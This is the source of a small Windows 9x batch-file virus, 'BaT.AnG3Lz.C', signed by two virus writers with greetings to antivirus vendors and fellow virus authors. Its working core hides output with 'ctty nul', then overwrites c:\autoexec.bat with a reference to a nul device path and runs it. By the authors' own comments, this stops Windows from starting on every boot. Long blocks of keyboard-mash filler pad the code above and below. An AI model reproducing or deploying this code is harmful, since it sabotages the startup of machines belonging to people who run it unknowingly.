gkvrejklolkjwanvblkawlvgkjhwnelgnvbjlengvjlnejlknvgbjenvbjvje123oqazklpomjniuhbvgytfo09uh9uyguhtt
jrehkjgvdfgtoilikjgrvjhuerhguoihgtuherhguhreghrekjhgkejsdhbck634laswtrtj98y87tuyfgcytd6e46rs5e45w
gefkjwgfkjgewkjfgkwejhgufksdjfgwueguifgewuigfiuwegfugukgfuiew234psda56fdgkmknjnhbhvggcfxfdxddeses
drkewgugfuigiudsgfiuewgiugeiugfiugiurgiugfriuegfiugefiuregiur3uiodsstertrtert5465tdggtdyrty5r6543
fkjhrekfkjegfkjregkjrgkjgfrkjgjgdxjavcvcdsfregirgjhdsadskjfkgyuimddspl,mkoijnbhuygvcftrdxsezawqai
kjrhgfrhjkvkjfdkjfdkjhfghtlkyyuil7kjlkhoogiyopigjfnhjhgiutottfpppsdeolpokijmnhbuvgyctfxrdzesawqaq
tkhjglklkhfbggnlyopiytpouroiydyhdhsdgtrgkuriuyoytoiryfduhdbcvorebwwslpokmjniuhbvgytfcdrxszewaqpoi
pfjglkjlkhglkjlkhujtgoiptupoiutpourpptoktijfjlgkjlfkjkljlfkgglsdvplohlkyjkgujkykoyotoyhogkljhhhul
jhjjhgkjkhjkgjkhjykjkgjjkjkhllooiypo5i0o8tropi875uijgkkjhvcvukddckkjkjkgjjkjkhllooiypo5i0o8tropi8
6ljkjg6u98u09utgj65jfodijugtjoygkjpofkhtkykykoykoypokjkyjkkjjjzxdnmgjoygkjpofkhtkykykoykoypokjkyj
yiypoihpoinblkvnhlkyjkgujkykoyotoyhogkljhhhuljkuhlklljkholhkkgxzefgsksdjfgwueguifgewuigfiuwegfugu
jhkjghjlnkjhljlkjlkyjlkhjyoiu549uoi23u4832u48u5ij5jtlkjrkljtttassswwmjniuhbvgytfcdrxszewaqpoiujky
ljhykjyklhjljlkjhyiojuoiyuityityuhtkjhyjkhoijytupoi0695u43iourzyeaaagkuriuyoytoiryfduhdbcvorebwws
eruu6yh4444refiuvy4587tuviygjreht98uyt984jhoiujg54oiujg9ituj4elkwerdujkykoyotogoiptupoiutpourppto
yhklljytopiu09865798yhigfbu54y98y9843uy9r2u09850t982508u90658wolpdaagkuriuyoytoiryfduhdbcvorebwws
mlknopbjivhhduhhbdghfgrgyuvg87gfv68lpomnjbivhudgy4ewuygrt88437tgrawfksdjfgwueguifgewuigfiuwegfugu
::
:: Created by 2 good friends reunited
:: DvL      ( dvl2003ro@yahoo.co.uk )
:: Ratty    ( ratty2001ro@yahoo.com )
:: Contact us.
::
@echo off
ctty nul
:: Creator  --- DVL and Ratty
:: VirName   -- BaT.AnG3Lz.C for win9x
:: GreetZ     - AV   - Kaspersky, F-Prot, BitDefender.
:: ======       VX   - Ratty, SpTh, Sad1c, AlcoPaul.
::              M1sC - NgL(My little aNGeL), AddeR, NiNo, MJ(Gotenks).
::
:: What about this V1rUz ???
:: 
:: It will halt windows every time u start your computer.
:: Enjoy some blue kernel errors :)
::
:: 3
:: 2
:: 1
:: Virus is starting ...
::
@echo c:\nul\nul>c:\autoexec.bat
@c:\autoexec.bat
::
:: Simple isn't it ???
::
gkvrejklolkjwanvblkawlvgkjhwnelgnvbjlengvjlnejlknvgbjenvbjvje123oqazklpomjniuhbvgytfo09uh9uyguhtt
jrehkjgverjgkvrvbjervjhuerhguoihgtuherhguhreghrekjhgkejsdhbck634laswtrtj98y87tuyfgcytd6e46rs5e45w
gefkjwgfkjgewkjfgkwejhgufksdjfgwueguifgewuigfiuwegfugukgfuiew234psda56fdgkmknjnhbhvggcfxfdxddeses
drkewgugfuigiudsgfiuewgiugeiugfiugiurgiugfriuegfiugefiuregiur3uiodsstertrtert5465tdggtdyrty5r6543
fkjhrekfkjegfkjregkjrgkjgfrkjgjgdxjavcvcdsfregirgjhdsadskjfkgyuimddspl,mkoijnbhuygvcftrdxsezawqai
kjrhgfrhjkvkjfdkjfdkjhfghtlkyyuil7kjlkhoogiyopigjfnhjhgiutottfpppsdeolpokijmnhbuvgyctfxrdzesawqaq
tkhjglklkhfbggnlyopiytpouroiydyhdhsdgtrgkuriuyoytoiryfduhdbcvorebwwslpokmjniuhbvgytfcdrxszewaqpoi
pfjglkjlkhglkjlkhujtgoiptupoiutpourpptoktijfjlgkjlfkjkljlfkgglsdvplohlkyjkgujkykoyotoyhogkljhhhul
jhjjhgkjkhjkgjkhjykjkgjjkjkhllooiypo5i0o8tropi875uijgkkjhvcvukddckkjkjkgjjkjkhllooiypo5i0o8tropi8
6ljkjg6u98u09utgj65jfodijugtjoygkjpofkhtkykykoykoypokjkyjkkjjjzxdnmgjoygkjpofkhtkykykoykoypokjkyj
yiypoihpoinblkvnhlkyjkgujkykoyotoyhogkljhhhuljkuhlklljkholhkkgxzefgsksdjfgwueguifgewuigfiuwegfugu
jhkjghjlnkjhljlkjlkyjlkhjyoiu549uoi23u4832u48u5ij5jtlkjrkljtttassswwmjniuhbvgytfcdrxszewaqpoiujky
ljhykjyklhjljlkjhyiojuoiyuityityuhtkjhyjkhoijytu;plokhigntufbyefsrewswsqiuyoytoiryfduhdbcvorebwws
eruu6yh4444refiuvy4587tuviygjreht98uyt984jhoiujg54oiujg9ituj4elkwerdujkykoyotogoiptupoiutpourppto
yhklljytopiu09865798yhigfbu54y98y9843uy9r2u09850t982508u90658wolpdaagkuriuyoytoiryfduhdbcvorebwws
mlknopbjivhhduhhbdghfgrgyuvg87gfv68gfygfvufertfgf4ewuygrt88437tgrawfksdjfgwueguifgewuigfiuwegfugu
ctty con
cls